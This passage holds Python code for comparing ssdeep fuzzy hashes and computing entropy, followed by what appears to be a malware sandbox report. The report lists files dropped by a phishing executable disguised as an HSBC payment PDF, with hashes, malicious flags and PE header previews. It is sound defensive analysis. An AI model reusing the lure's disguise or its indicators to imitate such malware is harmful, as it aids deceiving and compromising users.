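    "3563E4DA1C2DBACF554C51949192F618": "24576:8C1vpgXcZ/zr/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:8C1vpIc9rLNiXicJFFRGNzj3",
    "D27B2B2743008EEDADEBCF92D9216436": "24576:FSv/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:QLNiXicJFFRGNzj3",
    "0E1104F07AF738BDC80962244A071D2F": "24576:4WDntIfGpt/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:zZIeTLNiXicJFFRGNzj3",
}


def parse_ssdeep(digest: str):
    """Split 'blocksize:chunk:double_chunk' into (int, str, str)."""
    blocksize, chunk, double_chunk = digest.split(":", 2)
    return int(blocksize), chunk, double_chunk


def chunk_at_blocksize(digest: str, blocksize: int):
    """Return the chunk of `digest` computed at `blocksize`, or None if it has none.

    A digest at block size b stores a chunk at b and a second chunk at 2b, so it can
    only be compared with digests whose block size is b/2, b or 2b.
    """
    own_bs, chunk, double_chunk = parse_ssdeep(digest)
    if blocksize == own_bs:
        return chunk
    if blocksize == 2 * own_bs:
        return double_chunk
    return None


def common_suffix(strings):
    """Longest suffix shared by every string (empty list -> '')."""
    if not strings:
        return ""
    return commonprefix([s[::-1] for s in strings])[::-1]


def shared_tail(digests, blocksize: int):
    """(shared trailing chunk characters, number of digests comparable at `blocksize`).

    Chunk characters are emitted in file-offset order, so a long common suffix means
    the ends of the files produced the same piecewise hash.
    """
    chunks = [c for c in (chunk_at_blocksize(d, blocksize) for d in digests) if c is not None]
    return common_suffix(chunks), len(chunks)


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, the 'Entropy (8bit)' field of the report."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


if __name__ == "__main__":
    for bs in (24576, 49152):
        tail, n = shared_tail(DROPPED_SSDEEP.values(), bs)
        print(f"block size {bs}: {n} comparable digests, shared tail {tail!r}")
    # Constructed buffers to illustrate the entropy scale: uniform bytes score 8.0.
    print("entropy of 0..255:", shannon_entropy(bytes(range(256))))
    print("entropy of 64 zero bytes:", shannon_entropy(b"\x00" * 64))
```

At block size 49152 all ten digests are comparable (three by their own chunk, seven by their double-block chunk) and share the 15-character tail LNiXicJFFRGNzj3; at block size 24576 only the seven smaller-block digests take part and share a 29-character tail. The three 49152-block files are the largest records, which is why ssdeep picked the larger block size for them.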
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1564160
                                                                                                                                                  Entropy (8bit):5.002300604770758
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:4WDntIfGpt/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:zZIeTLNiXicJFFRGNzj3
                                                                                                                                                  MD5:0E1104F07AF738BDC80962244A071D2F
                                                                                                                                                  SHA1:24340778B0C0AAB4363A83444C0B6F74ADC81B30
                                                                                                                                                  SHA-256:753AF73A4B28276B28FA2943BDE74D5B55FBE21B44246EB526ED1F0348CFB690
                                                                                                                                                  SHA-512:57643FD46F392DD46173C44684A2371E5E1950B7E2D901116E2C7E770123E26E4BD27A05A84FCDC3E816613CEF70D0FED63A34C72F3CB1179A8644D8CCF49FD3
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@..............................#.....ph.... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...`...........>..............@...................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1340928
                                                                                                                                                  Entropy (8bit):4.611595878185602
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:dIhHiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:oz/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:40D30B8AE9E2DA6D3553001F90EF8B1D
                                                                                                                                                  SHA1:847CEA4D8B47A202C3454281744EE95AA7CDB03F
                                                                                                                                                  SHA-256:952A2A62EB35F0F9131382B7760F6BF5673AE2B63A5C57E39F7379F72D84687E
                                                                                                                                                  SHA-512:0744E57F399A51630A2567C45A1EE862A4A45575BADB9F800317A3AC4AF513C4567488F8BE7E0C36E51C8B4D57751847CDCA74ABE705DF23E602C7CF2F202424
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@.......................................... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...`...0......................@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1687552
                                                                                                                                                  Entropy (8bit):5.015372375315118
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:P8oRswt2ioQ3J+R+/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:P8oRxoF+LNiXicJFFRGNzj3
                                                                                                                                                  MD5:48A604651F551E7A4547D1F422C7955A
                                                                                                                                                  SHA1:95F12DDB662891F5076D011463C9B03DA727D26F
                                                                                                                                                  SHA-256:3BC895C9D57DEEED663A591DD50EEE25F6A2D4CE1CAEDB8A4CE52043AB18088C
                                                                                                                                                  SHA-512:5E91D9F67D21D2E7C6536707B2A2A8E6767478D2C2CC63B8808EAC243C027FE7D0CE94D2022097476374C92965B71432E909741775DE238B789DC9BDCC5E4247
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@..............................%........... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...`........... ..............@...........................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1497600
                                                                                                                                                  Entropy (8bit):4.7911139359160755
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:Cf8HQlTMxHwJ07w+/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:CkHQlawJ09LNiXicJFFRGNzj3
                                                                                                                                                  MD5:03751B15C62196B5EBA12EC2127EFB85
                                                                                                                                                  SHA1:26CD9E16656720F74CCC8CADAA6304A4F54EF4BE
                                                                                                                                                  SHA-256:C49FB2D77916BD068A411DBA510C8D75CC47FA91E7703E8DA0013F0A147B3A93
                                                                                                                                                  SHA-512:CB256DDCA2DC4B0C041AE38E900F0BF65074ED76F7373D26C317C1107FB202BF9D63DE49FD14C159A815A4F6A9E686363488B8CCB3E42C25E9D6A63840FFABC4
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x..............a.......r.......r...............r.......r.......r.......ry......r{......r......Rich....................PE..d...B{.?.........."............................@..............................!.....nQ.... .......... ......................................8b..........................................T.......................(...................@...(...pa..`....................text............................... ..`.rdata..............................@..@.data....&...........z..............@....pdata........... ..................@..@.didat.. ...........................@....rsrc...............................@..@.reloc...`...........:..............@...................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1534464
                                                                                                                                                  Entropy (8bit):7.117174764915904
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:qSEmYD6gjGPG45QVDkfX4lyTy9/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:q5mYD6g2GWQVQfeyTaLNiXicJFFRGNzb
                                                                                                                                                  MD5:2AF329B1E049D29D9351F6429670704F
                                                                                                                                                  SHA1:77CEA480ECFCA581F4F89B2CFA0127FD19DA18E3
                                                                                                                                                  SHA-256:DCEE74DB8F02F850DCE9742A2971D821F3391E424CC18E13736B593C8613B18B
                                                                                                                                                  SHA-512:1806AADC3160C05B324C22526E3DB0FDA763EA0E3732B1E9DB47F3939898B03E886BEC6350044A4536F7C1435E83A0BE0246D971C465082ECCDFF8AA56F374F2
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."x..f..Ef..Ef..EoaKEd..Err.De..Err.DB..Err.Dh..Err.D}..Ef..E...Err.D]..Err'Eg..Err.Dg..ERichf..E........................PE..d..."..m.........."..........4......@:.........@.....................................j.... .......... ..........................................,............`...N.................. ...T...........................p...................X...h...@....................text.............................. ..`.rdata...\.......^..................@..@.data....Y.......8..................@....pdata...N...`...P..................@..@.didat...............l..............@....rsrc................n..............@..@.reloc..............................@...................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):143378
                                                                                                                                                  Entropy (8bit):2.992349993841804
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:AIXLr4j+F05BmsDo6Mi0Fl7dSA6+8DdfD9CGcuY9Ihyvuu3srWVjjGqnBaAJZdjR:H30jU7axIGcuY9Ihyvuu3srWVeqnBaA
                                                                                                                                                  MD5:FA1714936B286E57B46653F77235A3A8
                                                                                                                                                  SHA1:854732BB09F435AD59281A4E9DAFA7D0EC160FF1
                                                                                                                                                  SHA-256:E1C3EF3E7D679C3F677189D3784A2C2AAC65D355D60EEBE93AF03B593B3A31C6
                                                                                                                                                  SHA-512:F6EF27ABDAC119DEC399B4054826A4B6B2CDBAB40A71DDF5E5CFB0F4A82B27D2ADFBB473612F8FE2C331A539B42021FF17BCF0AC67C62C4A88E0277FC16F1E6E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:dowp0dowpxdowp5dowp5dowp8dowpbdowpedowpcdowp8dowp1dowpedowpcdowpcdowpcdowp0dowp2dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowpbdowp8dowp6dowpbdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowp4dowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowp6dowpbdowpadowp7dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowp8dowpbdowp8dowp6dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowpadowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowpcdowpbdowpadowp6dowpcdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowpedowpbdowp8dowp3dowp3dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp9dowp0dowpbdowp9dowp3dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp9dowp2dowpbdowpadowp2dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp9dowp4dowpbdowp8dowp6dowp4dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9
                                                                                                                                                  Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65908
                                                                                                                                                  Entropy (8bit):7.899556468920535
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:yHspIawXuPvaiTfvYkZ2q2eWIs15PqHtORBdW4poejitrPXu:yHsiRERTHJZr2eWI0PGOtW4pTjUr/u
                                                                                                                                                  MD5:2291D7D715A21902A07FCDE81A8EC59D
                                                                                                                                                  SHA1:57B09D827A7523466AC332AD76965436A35C4E3F
                                                                                                                                                  SHA-256:CBCF58B1C2C51062CDD2D50549A8FF729008C4A6751FB367C6AC1C06A88EA710
                                                                                                                                                  SHA-512:9B3299F4D940E995D10E5A630AD01DF946979005CF5BDA519B8107D1B0465067790B56201A4E3659F8D5D09279B5A3A5A519DD99E3D0B1371414D3DC0AF1888C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:EA06..n.........R..4}.&.O.U.5J.&qY..*.....X.M.4.@..i.... .X.U.Uz.....z.P..1^.O-.y..c;..-..w=..r+e.Y!.O..H...y.M.2{.~.L..,f3..Rn..ec.x.x..5.....E..O.U(UZ...*..M^.t..?4..B+R.....f.L...,.kZzl.M.......hTZ......i.8.f+.....5x.P.c.:8....P. !.....o.U. ...X.@...e.......i...&aW..+`.....I.^'t.\..X.....8.aI.,&Up...6....Yd.s*.Vh`..J.F..@...$.k...0P...K..7Q..b.T..d.z}c......X...f.5Op....-uf.J........lS.UJmJ.A.,...X..........Z....... .......\.,$..........p..p.XL@..]B.Y......>....*.9...+.P......G.Qot.Ew.V.Rg..eb.H..htj...6..y.:MR.:..i....!G.B...E<.(.N...N.[...u*.v.a.M.7jE^.T.[....6.B..m6J...?.h/..=..8...UZ.~MJ.`9...f.V.B...-..<.T.t+........zm..c.I.U....R..%..d.d._mr..&q].V/.K..4...j.SW....."...Uj.;e..2.+).Y7.I._...?R..*6......U*....7X..*.....A.G,t....T.Rb..}b.B..(s....2..&.@."....!.]Rv.XO...}..........U.bh..2m_..#`.TP....(tj...y....{.2.I.Vl...R...]...#H..| .Ef.[.Z.R.%Vuf.Viv(.&.-.......1e.^p..N.b.......v.M.*/...4.!;z.....B ..X..!=.M[Q\..i....Q...(.+(..*.U*...>e...
                                                                                                                                                  Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):14596
                                                                                                                                                  Entropy (8bit):7.635598712147525
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:ITYznwMNeAOPPYLDfvWME/eTk5mUOY/l3FDKf3isCLbh:IAwJV8DfvWkOL93FDKasCXh
                                                                                                                                                  MD5:B48A4597F4E86165FCB59399257909C1
                                                                                                                                                  SHA1:4A13D4102E4B18D8D24AA8993F4A7745E01B2A63
                                                                                                                                                  SHA-256:6BC3DF8C955DE1276BB11455D5DAD6FAED98192F48139D111800E34598522947
                                                                                                                                                  SHA-512:9C14C8125DE5B54C00339A83736BA012B7380BE0DA47038C9316CB8C8B07297D12665F1A2F69BDB69AE105B6C54E24CAFDBA2B2A52C3560AA040C7513C9F791B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                                                                                                                                  Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):93696
                                                                                                                                                  Entropy (8bit):6.868568315377798
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:EGzcAcNLGdG+R7vzDChKkudDX3rf2/p4aEGPxbUbb0SLczhVPJ/rFh:7cA0LGdBfIKkupr6XEkxqb0lph
                                                                                                                                                  MD5:FDAD0D8DA0849142021EFD83808D474A
                                                                                                                                                  SHA1:D1B94552E5F9E89ADE83D03AFAE3CDF42FCF4307
                                                                                                                                                  SHA-256:1B08749B183A40AA06DE4549D1E97758BFB59BFAD279351356E3C9A6F27F5FC5
                                                                                                                                                  SHA-512:3539D9FE32EB79B3D84315D3B8059AE4E001ABB86887E53363FC273EE8AD139A4945FE13B40F62345B778FD75BD17320212758F424CA8DCE4E8D5B519FA354A0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:u..XVBURGFQG..YO.WITVI8Y.XUBURCFQGL6YOHWITVI8YOXUBURCFQGL6YO.WITXV.WO.\.t.B..f.^0<h';;1;Y4o;4,;=7f3"lD,!h>'t..ky"71'{_NLuGL6YOHW..VItXLX.x .CFQGL6YO.WKU]HhYO<TBUZCFQGL6W.IWItVI8.NXUB.RCfQGL4YOLWITVI8YKXUBURCFQ.M6YMHWITVI:Y..UBERCVQGL6IOHGITVI8Y_XUBURCFQGL6..IW.TVI8.NX.GURCFQGL6YOHWITVI8YO.TBYRCFQGL6YOHWITVI8YOXUBURCFQGL6YOHWITVI8YOXUBURCFQGL6YoHWATVI8YOXUBURKfQG.6YOHWITVI8Ya,0:!RCFE%M6YoHWI0WI8[OXUBURCFQGL6YOhWI4x;K+,XUB.WCFQ.M6YIHWI2WI8YOXUBURCFQG.6Y.f%,89*8YCXUBU.BFQEL6Y#IWITVI8YOXUBUR.FQ.L6YOHWITVI8YOXUB..BFQGL6.OHWKTSI .OX..UR@FQG.6YI(.IT.I8YOXUBURCFQGL6YOHWITVI8YOXUBURCFQGL6YOHWIT.4.V..+&..FQGL6YNJTMR^A8YOXUBUR=FQG.6YO.WITaI8YjXUB8RCFuGL6'OHW7TVI\YOX'BUR"FQG.6YO'WIT8I8Y1XUBKPkYQGF..OJ.iTVC8s.+tBUX.GQGHE{OH].VVI<*lXUH.QCFU4h6YE.SITR:.YOR.GURGl.GO.OIHWR;nI8SO[.WSRC]{aL4qvHWCT|o8Z.MSBUIidQE.?YOL}.'KI8_g.UB_&JFQE.<YOL}WV~.8YErw<FRCBzGf.'[HWM.Vc.'ZXUF~Rid/QL6]dH}k*AI8]dX.D.0C4.KLFZ )WIR~.8YEp.BUTClkG28YOLU&.VI2.e.Uj.RC@Qo.6YIH..TVO8q.XUDUz.FQAL.cO`.ITPI..OXSB..C8bGL2uH6dITRb.'~XUF.T;F
                                                                                                                                                  Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):12320
                                                                                                                                                  Entropy (8bit):7.984393411503989
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:HnzpEC4LrCCmRrW0BAtRMz2hGbL/XPz5SH3Kcy2pU:Hnz1MrCCmR3JCWXV03KV8U
                                                                                                                                                  MD5:8E5334A950BB89D1A8BCFBC032AF6D90
                                                                                                                                                  SHA1:3D224AEFE036033EE2E48DE2E940FFC609421125
                                                                                                                                                  SHA-256:4DD079089A420A5CE03342C0F980E8648E4EFA6D2E39F000C53DC9C4855A627C
                                                                                                                                                  SHA-512:0CAE7FC193F4EDF4735241A40E38F6159468DAC1D01248C08FFD3A8F3DAF9A86ABB9F2AA3EEE152B11A1CA0547FA2C873E791160671978FE3F8639211EE1CF14
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):2313
                                                                                                                                                  Entropy (8bit):5.131457057494496
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786n:Z070s0Y0q0mF7Dm5Q
                                                                                                                                                  MD5:2D8B4A253633CBA98E19E27B060A4D83
                                                                                                                                                  SHA1:A8F21CACD324CE3356204409E115BC7F11A7610A
                                                                                                                                                  SHA-256:012B58ADCBE65083D939D330B3163B77137AF4401CC7C97A514ECB9BDC7396BE
                                                                                                                                                  SHA-512:5BE13A1EA0B9619E2DB6B71B8B4043CCE86F943392C7C585193DBA15283ED41CB16BE74C7633D8C2266EBFE7AA43EEFBC16E104B73F8F73C2EFCA1989956E384
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy
                                                                                                                                                  Process:C:\Windows\System32\wbengine.exe
                                                                                                                                                  File Type:dBase III DBT, version number 0, next free block index 10240, 1st item "^^\020\"
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):30720
                                                                                                                                                  Entropy (8bit):1.1896887515235615
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:4z7/5M+TmNcNxPBXPKGVEo/PPoPAPePqFIeansYsSsfmUnV8:2/5M5clCGVEo5ddnm
                                                                                                                                                  MD5:A91949646E07C95FC4295FECDDB62C3B
                                                                                                                                                  SHA1:588532FD0203B6E573667E46B56F74199F224D86
                                                                                                                                                  SHA-256:820D86F906C06738F4E3070657C08F1C36BC8D1EA548962D8000283066FF19A7
                                                                                                                                                  SHA-512:6C0E1DDA9D8BB54F6B99C7606047EFE775B4910EEC59A92DE9CACBCC03186E9AC0474873A30A19014ED97FA1374C2EDC4243FC2417B62E9666FD7C47BE82E14C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):12320
                                                                                                                                                  Entropy (8bit):7.984867530157717
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:s7SrIK/rP8Em1BjabHOXhnhBe2YKGv/gagzLqB2UCVuHNJIhx4ws4QDlJaH2q2/h:s7pWSNdhsKGFgHqE6IYwzQvaH2q8nlQk
                                                                                                                                                  MD5:C5FDA9C7484A31EEE58179AC234421CA
                                                                                                                                                  SHA1:C9222569B9C16DE38B3830DFB0AC73F2D6621CB6
                                                                                                                                                  SHA-256:3343DCA704483582FD64B490FA13CF4AD0044E39D0319C098E9C027A8227C919
                                                                                                                                                  SHA-512:CF6C5ED3B7F9E093D6F79542B5A31B2486E76F2FBCF1844BD61E72B9E07E8F8A0FFE96E4042F19123EFD790DA4685695715785BC235BC8F90550E934FE113A9E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1306624
                                                                                                                                                  Entropy (8bit):4.538230049854179
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:HiiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Hk/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:436D2153822038C49A041E9D657F7E2D
                                                                                                                                                  SHA1:97A8FC3379B41652D740154770F5B6C2EEB178DD
                                                                                                                                                  SHA-256:E0ABB4330A8422589222DD99DC007FA17413209DBAB4D4C55096BAE2449275B2
                                                                                                                                                  SHA-512:6B035ECE3C0C2127D9319F5EE6218B5DBAEC0E010C3D5857B68E0B1F743C8C66ABACC008EC43BECFD55C6A107E7DB11E891897BF55E6C07F77B1FED1515E9F45
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1801216
                                                                                                                                                  Entropy (8bit):6.967204885640469
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:qwVFr68Vw9wn/6h8p1zid5LNiXicJFFRGNzj3:qwVFrssCnd57wRGpj3
                                                                                                                                                  MD5:7CFA6C3EAA73B924E9F391CE7ED6CFFF
                                                                                                                                                  SHA1:EC2C1DA21CFF35AA4B44164506F3E34721A91825
                                                                                                                                                  SHA-256:DB3A2DCE6A8B4A35C40AB56BD0CF7DFB12F28CF4D80DAF03DEA23283BF834D73
                                                                                                                                                  SHA-512:1C210E123F537377C08D73A00D2AC26819D745022938CD614CDF68F94E95CBB841187CF0289C5F73512BD742FB4C1196F272663C8D786CB0CE6863EF4A026561
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):1348608
                                                                                                                                                  Entropy (8bit):7.243439755764336
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:vQW4qoNUgslKNX0Ip0MgHCp+MBOuU/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:vQW9BKNX0IPgi8MBOuULNiXicJFFRGNf
                                                                                                                                                  MD5:6CEADD1DB47FACFB65E07258640DCDB8
                                                                                                                                                  SHA1:38EEC9A3A708CCBB3C9289EF366D1906CD32244E
                                                                                                                                                  SHA-256:5B2505BF31483499DBF55F976DC91EC8D4405778D19A32130219D6B46D25BEB4
                                                                                                                                                  SHA-512:06B818E80A3ACB10F6212DF7E08CBD70E4CDBF38AF944DAB70E136E08FB94CFD316722520366D0E088136A8DC8B92ABB0E141FD63F4EF416A0535A41E9542004
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1379840
                                                                                                                                                  Entropy (8bit):4.681777172476258
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:O2G7AbHjkb/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:O2G7AbHjSLNiXicJFFRGNzj3
                                                                                                                                                  MD5:82FD3B21343E884A947B12624BA14B65
                                                                                                                                                  SHA1:74EBD890D183F123679279E16241572BFB02B61B
                                                                                                                                                  SHA-256:B09288552C6F85EF1EC5198A1E3C07C10957662877520651B2E8BA26E94C1D67
